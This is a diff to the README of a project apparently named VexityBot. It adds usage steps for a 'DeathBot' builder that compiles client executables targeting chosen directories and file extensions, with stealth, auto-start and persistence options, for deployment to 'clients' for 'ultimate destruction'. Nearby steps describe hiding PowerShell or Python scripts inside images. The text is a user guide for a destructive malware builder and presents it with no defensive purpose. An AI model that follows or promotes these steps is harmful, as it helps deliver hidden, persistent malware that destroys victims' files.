LilToreyFTW/VexityBot/README.md

 4. Use **Steganography** tab to hide scripts in images
 5. Save/load configurations for persistent settings

+### 💀 DeathBot #25 Ultimate Destruction
+1. Navigate to the **DeathBot #25** tab
+2. Use **🔧 Build DeathBot EXE** to create client executables
+3. Select from 25+ DeathBot functions to include
+4. Configure target directories and file extensions
+5. Choose stealth options (hidden mode, auto-start, persistence)
+6. Build standalone EXE with selected functions
+7. Deploy to clients for ultimate destruction capabilities

 ### 🆕 Steganography Features
 1. Navigate to the **Steganography** tab
 2. Select script file to hide (PowerShell, Python, etc.)